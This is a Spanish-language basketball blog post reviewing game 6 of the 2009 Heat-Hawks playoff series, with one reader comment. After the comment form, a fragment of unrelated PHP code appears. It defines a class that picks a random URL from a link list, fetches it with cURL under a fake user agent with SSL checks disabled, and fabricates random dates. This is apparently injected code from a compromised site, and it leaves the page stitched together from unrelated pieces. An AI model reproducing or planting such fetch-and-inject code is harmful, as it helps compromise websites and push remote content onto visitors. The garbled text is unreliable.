Playoffs (01/04/2009): El mundo de Dwyane

02 de May de 2009 por TheDeerHunter

Un sólo partido anoche, de las dos series que quedan todavía activas, ambas en el Este.

Al contrario de la otra, el Heat-Hawks se está caracterizando por una especie de trastorno bipolar donde el equipo que inflinge un correctivo un día lo sufre el siguiente. Una diferencia media de más de 15 puntos a favor de cualquiera de los dos equipos, en función, la mayoría de veces, de si los Hawks han logrado frenar la animalada de turno que se le haya ocurrido hacer al señor Dwyane Wade.

La estrategia de los Hawks en el quinto partido de incrementar el factor físico hasta alcanzar el garrotazo vil, les otorgó la victoria. El precio que pagaron fue una lesión de Al Horford en otro lance violento del partido… y sólo le faltaba  ya a Wade pasear por la zona de los Hawks como si estuviera en su casa. Los Heat tampoco pudieron contar con Jermaine O’Neal, aunque el peso específico de uno y otro no es actualmente el mismo.Anoche no hubo forma humana de detener a Flash, ni siquiera por lo criminal… ni lo olían.  41 puntos se marcó el amigo. Además, los espadas de los Hawks se estrellaron contra la defensa local que ahora mismo es de todo menos amable. Sólo Bibby fue capaz de cuajar un partido mínimamente digno mientras que Josh Smith se quedó en 7 míseros puntos. No era el partido más idóneo para cerrar la eliminatoria. El Philips Arena será una caldera el próximo domingo.

Pero no sólo a Wade le benefició la lesión de Horford, Beasley también se marcó su mejor partido de la serie con 22 puntos y 15 rebotes. Eso sí, necesito 3 tiros más que Wade para alcanzar la mitad de sus puntos. Lo de este chico no se entiende ni siquiera en los mejores casos.

Ahora, preparaos todos que a las 2 de la próxima madrugada se juega el 7º del Bulls-Celtics. A los aficionados de ambos equipos os recomendamos que no lo veáis, que el sufrimiento es malo para la salud. El resto, nos vemos esta noche…

Comenta

Un comentario a esta entrada

  1. aro_pasado_no_newtoniano dice:
    #1

    Genial el título.

    Yo tampoco entiendo lo de Beasley. Almenos rebotea genial en terminos cuantitativos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>